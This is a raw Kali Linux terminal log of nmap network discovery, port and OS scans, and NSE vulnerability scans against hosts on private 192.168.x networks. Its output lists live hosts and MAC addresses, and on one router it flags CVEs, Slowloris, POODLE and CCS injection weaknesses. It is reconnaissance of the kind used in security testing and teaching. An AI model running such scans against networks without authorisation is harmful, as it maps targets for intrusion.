Host is up (0.00098s latency).
MAC Address: F4:4D:30:51:12:A4 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.29
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:71:D9 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.31
Host is up (0.00020s latency).
MAC Address: F4:4D:30:51:6C:5C (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.32
Host is up (0.00015s latency).
MAC Address: F4:4D:30:52:1E:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.33
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:6D:E7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.34
Host is up (0.00025s latency).
MAC Address: F4:4D:30:51:13:A7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.35
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:14:12 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.36
Host is up (0.00070s latency).
MAC Address: F4:4D:30:52:21:36 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.37
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:6D:A0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.38
Host is up (0.00056s latency).
MAC Address: F4:4D:30:51:12:B6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.39
Host is up (0.00069s latency).
MAC Address: F4:4D:30:51:14:AC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.40
Host is up (0.00079s latency).
MAC Address: F4:4D:30:51:6D:EC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.41
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:14:B8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.44
Host is up (0.00067s latency).
MAC Address: F4:4D:30:51:6D:56 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.45
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:71:D5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.46
Host is up (0.00012s latency).
MAC Address: F4:4D:30:51:6C:44 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.48
Host is up (0.00053s latency).
MAC Address: F4:4D:30:51:71:72 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.49
Host is up (0.00053s latency).
MAC Address: F4:4D:30:51:6C:80 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.51
Host is up (0.00069s latency).
MAC Address: F4:4D:30:51:13:2F (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.52
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:71:E1 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.53
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:8F:77 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.55
Host is up (0.00074s latency).
MAC Address: F4:4D:30:51:6E:AF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.58
Host is up (0.00070s latency).
MAC Address: F4:4D:30:51:6C:6B (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.61
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:17:D7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.65
Host is up (0.00078s latency).
MAC Address: F4:4D:30:51:71:E2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.67
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:94 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.69
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:6D:CF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.70
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:BF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.71
Host is up (0.00025s latency).
MAC Address: C4:70:AB:63:44:8E (Ruijie Networks)
Nmap scan report for kali.lan (192.168.2.208)
Host is up.
Nmap done: 256 IP addresses (47 hosts up) scanned in 5.66 seconds
┌──(root㉿kali)-[/home/kali]
└─# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
┌──(root㉿kali)-[/home/kali]
└─# vim scan.txt
┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.2.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:10 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00034s latency).
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.2
Host is up (0.000094s latency).
MAC Address: F4:4D:30:51:6D:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.3
Host is up (0.00071s latency).
MAC Address: F4:4D:30:51:6D:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.4
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:D7:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.6
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:13:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.7
Host is up (0.00023s latency).
MAC Address: F4:4D:30:51:16:E3 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.9
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:16:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.11
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:C5:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.12
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:15:F6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.13
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:15:F7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.14
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:70:FC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.18
Host is up (0.00013s latency).
MAC Address: F4:4D:30:51:6C:B2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.22
Host is up (0.00075s latency).
MAC Address: F4:4D:30:51:14:BC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.23
Host is up (0.00077s latency).
MAC Address: F4:4D:30:51:15:E5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.24
Host is up (0.00072s latency).
MAC Address: F4:4D:30:52:1E:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.26
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:15:4A (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.27
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:12:A6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.28
Host is up (0.00096s latency).
MAC Address: F4:4D:30:51:12:A4 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.29
Host is up (0.000090s latency).
MAC Address: F4:4D:30:51:71:D9 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.31
Host is up (0.00012s latency).
MAC Address: F4:4D:30:51:6C:5C (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.32
Host is up (0.00070s latency).
MAC Address: F4:4D:30:52:1E:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.33
Host is up (0.00013s latency).
MAC Address: F4:4D:30:51:6D:E7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.34
Host is up (0.00070s latency).
MAC Address: F4:4D:30:51:13:A7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.35
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:14:12 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.36
Host is up (0.00012s latency).
MAC Address: F4:4D:30:52:21:36 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.37
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:A0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.38
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:12:B6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.39
Host is up (0.00025s latency).
MAC Address: F4:4D:30:51:14:AC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.40
Host is up (0.00081s latency).
MAC Address: F4:4D:30:51:6D:EC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.41
Host is up (0.00077s latency).
MAC Address: F4:4D:30:51:14:B8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.44
Host is up (0.00075s latency).
MAC Address: F4:4D:30:51:6D:56 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.45
Host is up (0.000097s latency).
MAC Address: F4:4D:30:51:71:D5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.46
Host is up (0.00017s latency).
MAC Address: F4:4D:30:51:6C:44 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.48
Host is up (0.00023s latency).
MAC Address: F4:4D:30:51:71:72 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.49
Host is up (0.00013s latency).
MAC Address: F4:4D:30:51:6C:80 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.51
Host is up (0.00041s latency).
MAC Address: F4:4D:30:51:13:2F (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.52
Host is up (0.00074s latency).
MAC Address: F4:4D:30:51:71:E1 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.53
Host is up (0.00075s latency).
MAC Address: F4:4D:30:51:8F:77 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.55
Host is up (0.0014s latency).
MAC Address: F4:4D:30:51:6E:AF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.58
Host is up (0.00035s latency).
MAC Address: F4:4D:30:51:6C:6B (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.61
Host is up (0.00081s latency).
MAC Address: F4:4D:30:51:17:D7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.65
Host is up (0.00081s latency).
MAC Address: F4:4D:30:51:71:E2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.67
Host is up (0.00070s latency).
MAC Address: F4:4D:30:51:6D:94 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.69
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:6D:CF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.70
Host is up (0.00071s latency).
MAC Address: F4:4D:30:51:6D:BF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.71
Host is up (0.00018s latency).
MAC Address: C4:70:AB:63:44:8E (Ruijie Networks)
Nmap scan report for kali.lan (192.168.2.208)
Host is up.
Nmap done: 256 IP addresses (47 hosts up) scanned in 1.66 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -p 192.168.2.1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:12 UTC
Error #487: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!
┌──(root㉿kali)-[/home/kali]
└─# nmap -p 1-8888 192.168.2.1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:12 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00040s latency).
Not shown: 8885 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 22.55 seconds
┌──(root㉿kali)-[/home/kali]
└─# unicornscan -r 100000 -m U -Iv 192.168.2.0/24 :1-8888
Command 'unicornscan' not found, but can be installed with:
apt install unicornscan
Do you want to install it? (N/y)y
apt install unicornscan
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package unicornscan
┌──(root㉿kali)-[/home/kali]
└─# Unicornscan -r 100000 -m U -Iv 192.168.2.0/24 :1-8888
Command 'Unicornscan' not found, did you mean:
command 'unicornscan' from deb unicornscan
Try: apt install <deb name>
┌──(root㉿kali)-[/home/kali]
└─# Unicornscan -r 100000 -m U -Iv 192.168.2.0/24 :1-8888
Command 'Unicornscan' not found, did you mean:
command 'unicornscan' from deb unicornscan
Try: apt install <deb name>
┌──(root㉿kali)-[/home/kali]
└─# apt-get install unicornscan
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package unicornscan
┌──(root㉿kali)-[/home/kali]
└─# nmap -O 192.168.2.1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:17 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00035s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|8|Vista|2008
OS CPE: cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
┌──(root㉿kali)-[/home/kali]
└─# namp -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse
Command 'namp' not found, did you mean:
command 'nama' from deb nama
command 'wamp' from deb python3-autobahn
command 'nmap' from deb nmap
command 'pamp' from deb paml
command 'nam' from deb nam
Try: apt install <deb name>
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:23 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00025s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:24 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00043s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script==smb-vuln-ms10-061.nse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:24 UTC
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:833: '=smb-vuln-ms10-061.nse' did not match a category, filename, or directory
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nse_main.lua:833: in local 'get_chosen_scripts'
/usr/bin/../share/nmap/nse_main.lua:1344: in main chunk
[C]: in ?
QUITTING!
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:25 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00036s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:27 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00030s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
┌──(root㉿kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.2.208 netmask 255.255.255.0 broadcast 192.168.2.255
inet6 fe80::3103:3e0a:d4e8:8ef8 prefixlen 64 scopeid 0x20<link>
ether f4:4d:30:51:d6:df txqueuelen 1000 (Ethernet)
RX packets 1952 bytes 342996 (334.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 22482 bytes 1329568 (1.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 128 bytes 6440 (6.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 128 bytes 6440 (6.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(root㉿kali)-[/home/kali]
└─#
┌──(root㉿kali)-[/home/kali]
└─# nmap -T4 -A -v 192.168.0.19 --script=vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 17:18 UTC
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:18
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 0.00% done
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 0.00% done
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 0.00% done
Completed NSE at 17:18, 10.00s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Initiating ARP Ping Scan at 17:18
Scanning 192.168.0.19 [1 port]
Completed ARP Ping Scan at 17:18, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:18
Completed Parallel DNS resolution of 1 host. at 17:18, 0.00s elapsed
Initiating SYN Stealth Scan at 17:18
Scanning 192.168.0.19 [1000 ports]
Discovered open port 135/tcp on 192.168.0.19
Discovered open port 445/tcp on 192.168.0.19
Discovered open port 49158/tcp on 192.168.0.19
Discovered open port 49152/tcp on 192.168.0.19
Discovered open port 49153/tcp on 192.168.0.19
Discovered open port 49155/tcp on 192.168.0.19
Discovered open port 49154/tcp on 192.168.0.19
Discovered open port 139/tcp on 192.168.0.19
Completed SYN Stealth Scan at 17:18, 1.14s elapsed (1000 total ports)
Initiating Service scan at 17:18
Scanning 8 services on 192.168.0.19
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 37.50% done; ETC: 17:20 (0:01:00 remaining)
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 37.50% done; ETC: 17:20 (0:01:05 remaining)
Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 37.50% done; ETC: 17:20 (0:01:13 remaining)
Completed Service scan at 17:19, 58.56s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.19
NSE: Script scanning 192.168.0.19.
Initiating NSE at 17:19
Completed NSE at 17:19, 8.05s elapsed
Initiating NSE at 17:19
Completed NSE at 17:19, 0.03s elapsed
Nmap scan report for 192.168.0.19
Host is up (0.00024s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
MAC Address: F4:4D:30:51:16:F7 (Elitegroup Computer Systems)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Uptime guess: 0.087 days (since Fri Apr 21 15:14:06 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: B018; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
TRACEROUTE
HOP RTT ADDRESS
1 0.24 ms 192.168.0.19
NSE: Script Post-scanning.
Initiating NSE at 17:19
Completed NSE at 17:19, 0.00s elapsed
Initiating NSE at 17:19
Completed NSE at 17:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.57 seconds
Raw packets sent: 1083 (48.350KB) | Rcvd: 1017 (41.390KB)
┌──(root㉿kali)-[/home/kali]
└─# nmap -T4 -A -v 192.168.0.19 --script=vulnsamba-vuln-cve-2012-1182
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 17:23 UTC
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:833: 'vulnsamba-vuln-cve-2012-1182' did not match a category, filename, or directory
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nse_main.lua:833: in local 'get_chosen_scripts'
/usr/bin/../share/nmap/nse_main.lua:1344: in main chunk
[C]: in ?
QUITTING!
┌──(root㉿kali)-[/home/kali]
└─# vim new
┌──(root㉿kali)-[/home/kali]
└─# nmap -T4 -A -v 192.168.0.1 --script=vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 17:27 UTC
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:27
Completed NSE at 17:27, 10.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating ARP Ping Scan at 17:27
Scanning 192.168.0.1 [1 port]
Completed ARP Ping Scan at 17:27, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:27
Completed Parallel DNS resolution of 1 host. at 17:27, 0.00s elapsed
Initiating SYN Stealth Scan at 17:27
Scanning 192.168.0.1 [1000 ports]
Discovered open port 443/tcp on 192.168.0.1
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 53/tcp on 192.168.0.1
Completed SYN Stealth Scan at 17:27, 4.75s elapsed (1000 total ports)
Initiating Service scan at 17:27
Scanning 3 services on 192.168.0.1
Completed Service scan at 17:30, 142.15s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.1
NSE: Script scanning 192.168.0.1.
Initiating NSE at 17:30
Completed NSE at 17:31, 75.29s elapsed
Initiating NSE at 17:31
Completed NSE at 17:31, 3.61s elapsed
Nmap scan report for 192.168.0.1
Host is up (0.00089s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.35:
| CVE-2019-11072 7.5 https://vulners.com/cve/CVE-2019-11072
| CVE-2014-2323 7.5 https://vulners.com/cve/CVE-2014-2323
| CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
| CVE-2015-3200 5.0 https://vulners.com/cve/CVE-2015-3200
| CVE-2014-2324 5.0 https://vulners.com/cve/CVE-2014-2324
|_ OSV:CVE-2022-41556 0.0 https://vulners.com/osv/OSV:CVE-2022-41556
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
443/tcp open ssl/http lighttpd 1.4.35
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
| Modulus Type: Non-safe prime
| Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-server-header: lighttpd/1.4.35
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ http://www.cvedetails.com/cve/2014-0224
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.35:
| CVE-2019-11072 7.5 https://vulners.com/cve/CVE-2019-11072
| CVE-2014-2323 7.5 https://vulners.com/cve/CVE-2014-2323
| CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
| CVE-2015-3200 5.0 https://vulners.com/cve/CVE-2015-3200
| CVE-2014-2324 5.0 https://vulners.com/cve/CVE-2014-2324
|_ OSV:CVE-2022-41556 0.0 https://vulners.com/osv/OSV:CVE-2022-41556
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: C0:B8:E6:B6:07:74 (Ruijie Networks)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 3.0
Uptime guess: 0.140 days (since Fri Apr 21 14:09:46 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.89 ms 192.168.0.1
NSE: Script Post-scanning.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 237.89 seconds
Raw packets sent: 2031 (90.302KB) | Rcvd: 17 (1.378KB)